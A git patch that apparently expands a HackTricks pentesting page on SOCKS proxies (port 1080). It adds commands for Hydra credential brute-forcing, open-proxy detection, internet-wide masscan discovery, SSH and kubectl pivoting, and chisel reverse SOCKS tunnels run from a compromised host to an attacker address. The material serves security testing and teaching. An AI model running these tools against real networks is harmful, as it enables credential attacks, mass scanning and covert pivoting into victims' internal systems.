From b15c7b8fac108daef68dcd137b22f2283adbdd21 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 20 Dec 2025 08:29:12 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/network-services-pentesting/10... --- src/SUMMARY.md | 1 + .../inputmethodservice-ime-abuse.md | 1 + .../1080-pentesting-socks.md | 75 ++++++++++++++++++- 3 files changed, 74 insertions(+), 3 deletions(-) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index fdf253b1bef..9ac5c0d0b19 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -375,6 +375,7 @@ - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md) - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md) - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md) + - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md) - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md) - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md) - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md) diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md index 878d498c40e..8251e907770 100644 --- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md +++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md @@ -81,3 +81,4 @@ adb shell ime help - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices. - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI). +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/1080-pentesting-socks.md b/src/network-services-pentesting/1080-pentesting-socks.md index d7ec28ee51e..114a177d329 100644 --- a/src/network-services-pentesting/1080-pentesting-socks.md +++ b/src/network-services-pentesting/1080-pentesting-socks.md @@ -4,7 +4,7 @@ ## Basic Information -**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets, operating at the session layer (Layer 5) of the OSI model. +**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets (via the `UDP ASSOCIATE` command), operating at the session layer (Layer 5) of the OSI model. When tooling supports the `socks5h` scheme, DNS resolution is forced through the proxy, preventing local DNS leaks and making it harder to fingerprint the originating host. **Default Port:** 1080 @@ -42,6 +42,46 @@ PORT STATE SERVICE |_ Performed 1921 guesses in 6 seconds, average tps: 320 ``` +#### Hydra module + +```bash +hydra -L users.txt -P passwords.txt -s 1080 -t 16 -V socks5 +``` + +### Method & open-proxy enumeration + +```bash +nmap -sV --script socks-methods,socks-open-proxy -p 1080 +``` + +`socks-methods` forces the server to list supported authentication types, while `socks-open-proxy` attempts an outbound CONNECT to confirm whether the service can be abused as a relay. + +#### Raw handshake check + +```bash +printf '\x05\x01\x00' | nc -nv 1080 +``` + +A `\x05 01 00` response indicates SOCKS5 offering "no authentication". Any `\x00` followed by `\x02` means username/password is required, which is useful for quickly fingerprinting exposed devices in scripts. + +### Quick egress validation + +```bash +curl --socks5-hostname :1080 https://ifconfig.me +curl --socks5-hostname user:pass@:1080 http://internal.target +``` + +Use `--socks5-hostname` (or `socks5h://` URLs) so DNS resolution happens remotely. Pair it with `proxychains4 -q nmap -sT -Pn --top-ports 200 ` to verify whether the proxy truly provides internal reach. + +### Internet-wide discovery / fingerprinting + +```bash +masscan 0.0.0.0/0 -p1080 --banners --rate 100000 -oX socks.xml +``` + +Feed results back into NSE, `zgrab2`, or custom python scripts to prioritize promising hosts (e.g., banner strings like `3proxy`, `Dante`, `MikroTik`). + + ## Tunneling and Port Forwarding ### Basic proxychains usage @@ -64,9 +104,38 @@ With auth socks5 10.10.10.10 1080 username password ``` -#### More info: [Tunneling and Port Forwarding](../generic-hacking/tunneling-and-port-forwarding.md) +Pro tip: switch to `dynamic_chain`, enable `proxy_dns`, and shorten `tcp_read_time_out`/`tcp_connect_time_out` to make brute-force enumeration over latent tunnels far more reliable. -{{#include ../banners/hacktricks-training.md}} +### SSH dynamic SOCKS (cloud / Kubernetes pivoting) +```bash +ssh -D 1080 -q -N attacker@bastion.example +export HTTPS_PROXY=socks5h://127.0.0.1:1080 +kubectl get pods +``` + +Setting `socks5h://` (or `--socks5-hostname` in curl) forces the bastion to resolve cluster hostnames, eliminating local DNS leakage. You can permanently bind the proxy to a specific `kubectl` context with: + +```bash +kubectl config set-cluster --proxy-url=socks5h://127.0.0.1:1080 +``` +### Rapid SOCKS implants for pivoting +```bash +# Attacker +chisel server --reverse --port 9000 --socks5 + +# Compromised target +chisel client attacker_ip:9000 R:socks +``` + +This spawns a reverse SOCKS5 tunnel entirely over a single outbound TCP link, perfect for environments with egress filtering. Combine it with `proxychains` on the attacker side to route RDP/SMB enumeration through the freshly established tunnel. + +#### More info: [Tunneling and Port Forwarding](../generic-hacking/tunneling-and-port-forwarding.md) + +## References + +- [Use a SOCKS5 Proxy to Access the Kubernetes API (Kubernetes Docs, 2024)](https://kubernetes.io/docs/tasks/extend-kubernetes/socks5-proxy-access-api) + +{{#include ../banners/hacktricks-training.md}}